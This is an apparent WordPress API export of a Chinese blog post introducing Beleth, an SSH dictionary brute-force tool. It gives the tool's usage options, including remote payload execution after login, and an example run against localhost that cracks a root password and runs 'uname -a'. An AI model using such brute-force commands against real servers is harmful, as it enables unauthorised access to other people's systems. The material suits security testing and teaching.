{"id":599,"date":"2014-07-15T14:46:02","date_gmt":"2014-07-15T14:46:02","guid":{"rendered":"http:\/\/ixyzero.com\/blog\/?p=599"},"modified":"2014-07-15T14:46:02","modified_gmt":"2014-07-15T14:46:02","slug":"ssh%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%e5%b7%a5%e5%85%b7-beleth","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/599.html","title":{"rendered":"SSH\u66b4\u529b\u7834\u89e3\u5de5\u5177 &#8211; Beleth"},"content":{"rendered":"<p>Beleth\u662f\u4e00\u4e2a\u57fa\u4e8e\u5b57\u5178\u7684SSH\u66b4\u529b\u7834\u89e3\u5de5\u5177\u3002\u4f7f\u7528\u65b9\u6cd5\u548c\u9009\u9879\u5982\u4e0b\uff1a<\/p>\n<pre class=\"lang:default decode:true \">Usage: .\/beleth [OPTIONS]\n-c [payload] Execute payload on remote server once logged in\n-h Display this help\n-l [threads] Limit threads to given number. Default: 4\n-p [port] Specify remote port\n-P [password] Use single password attempt\n-t [target] Attempt connections to this server\n-u [user] Attempt connection using this username\n-v -v (Show attempts) -vv (Show debugging)\n-w [wordlist] Use this wordlist. Defaults to wordlist.txt<\/pre>\n<p>\u4f7f\u7528\u793a\u4f8b\uff1a<\/p>\n<p>$ .\/beleth -l 15 -t 127.0.0.1 -u stderr -w wordlist.txt<br \/>\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br \/>\n\u2502 Beleth \u2502<br \/>\n\u2502 www.chokepoint.net \u2502<br \/>\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br \/>\n[*] Read 25 passwords from file.<br \/>\n[*] Starting task manager<br \/>\n[*] Spawning 15 threads<br \/>\n[*] Starting attack on root@127.0.0.1:22<br \/>\n[*] Authentication succeeded (root:jesus@127.0.0.1:22)<br \/>\n[*] Executing: uname -a<br \/>\n[*] Linux eclipse 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1+deb7u1 i686 GNU\/Linux<br \/>\n[*] Cleaning up child processes.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Beleth\u662f\u4e00\u4e2a\u57fa\u4e8e\u5b57\u5178\u7684SSH\u66b4\u529b\u7834\u89e3\u5de5\u5177\u3002\u4f7f\u7528\u65b9\u6cd5\u548c\u9009\u9879\u5982\u4e0b\uff1a Usage: .\/beleth [OPT [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,25,12],"tags":[234,153],"class_list":["post-599","post","type-post","status-publish","format-standard","hentry","category-linux","category-security","category-tools","tag-bruteforce","tag-ssh"],"views":3503,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/599","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=599"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/599\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=599"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=599"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=599"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}